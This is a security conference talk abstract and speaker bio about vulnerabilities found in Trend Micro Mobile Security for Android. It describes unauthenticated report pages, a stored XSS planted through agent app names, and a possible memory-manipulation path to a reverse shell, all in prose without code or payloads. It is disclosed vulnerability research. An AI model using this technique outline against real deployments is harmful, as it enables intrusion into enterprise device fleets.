2025-09-05 –, Track 2
Trend Micro Mobile Security (TMMS) is a solution widely trusted by enterprises to defend Android devices. But what if the protection becomes the threat? In this talk, I reveal how the very software meant to secure mobile endpoints can be exploited to compromise them. During my research, I identified three vulnerabilities, two confirmed by the vendor.
First, I found that TMMS exposes sensitive security reports online without requiring authentication, revealing device data to anyone. Second, I uncovered a persistent stored XSS sent from Android agents during scans. This payload executes in the browser of any who accesses the report, allowing attackers to inject further malicious scripts. Lastly, I’ll discuss a memory-level manipulation identified during dynamic analysis of the scan routine, which could lead to code execution. These flaws present a high-impact attack surface individually, and a dangerous chain if combined.
This presentation includes recorded demos and a deep dive into the methodology used to discover these issues. It is tailored for red teamers, offensive security professionals, and researchers focused on mobile and infrastructure security.
This talk is the result of hands-on vulnerability research focused on Trend Micro’s enterprise-grade mobile security solution, TMMS. The project began with a simple question: Can the tools used to protect mobile devices be turned against themselves? That curiosity led to a series of discoveries, two of which Trend Micro acknowledged as confirmed security issues.
The first vulnerability centers on unauthenticated access to TMMS’s device report pages. These pages expose scan histories, app inventories, and device status, all accessible without any form of authentication. This flaw represents a significant breach of confidentiality, offering an attacker valuable insights about an organization’s device fleet and security posture.
Digging deeper, I found that these unauthenticated reports also served as a perfect delivery channel for a stored cross-site scripting attack. By modifying the name of an app on an enrolled Android agent, a value later displayed in the web console, I was able to inject JavaScript directly into the report page. Since this page is rendered without sanitization and without login, the script executes in the browser of any administrator or user who accesses it.
The final and most technically complex finding lies within the TMMS Android agent. While inspecting its scan routines via reverse engineering and dynamic testing, I identified a potential path to code execution. By altering function parameters in memory during an antivirus scan, it may be possible to invoke unintended behavior, including spawning a reverse shell. Although Trend Micro has not confirmed this issue, preliminary results suggest the feasibility of remote command execution through controlled memory manipulation, especially if initiated from a compromised server or malicious agent.
My talk will take attendees through each phase of the research, from initial reconnaissance and passive analysis to deeper reverse engineering of the Android APK and memory manipulation during runtime. I will demonstrate how these flaws intersect and discuss the viability of chaining them into a full exploit path. The narrative will include recorded demos, such as viewing a report without credentials, triggering XSS via Android scan, and memory patching leading to command execution, to help make the technical impact tangible.
Beyond showcasing vulnerabilities, I’ll reflect on disclosure, vendor response, and the implications for other mobile security products. Attendees will leave with a deeper appreciation for the risks hidden in trusted software, as well as techniques they can apply to analyze similar solutions.
Lucas Carmo is an offensive security researcher and co-founder of Hakai Security, a Brazilian consultancy focused on red teaming and exploit development. With over eight years of experience, he holds OSWE, OSWP, and GMOB certifications and has discovered CVEs in platforms like Trend Micro Mobile Security, Nagios, PRTG, 3CX, and Centreon. He leads Delta7, Hakai’s research division, guiding work on vulnerabilities in all environments. Lucas contributes to open-source projects such as the ReconFTW web UI and shares research through blogs and talks. Outside of hacking, he’s passionate about tattoos and views vulnerability research as a form of digital art.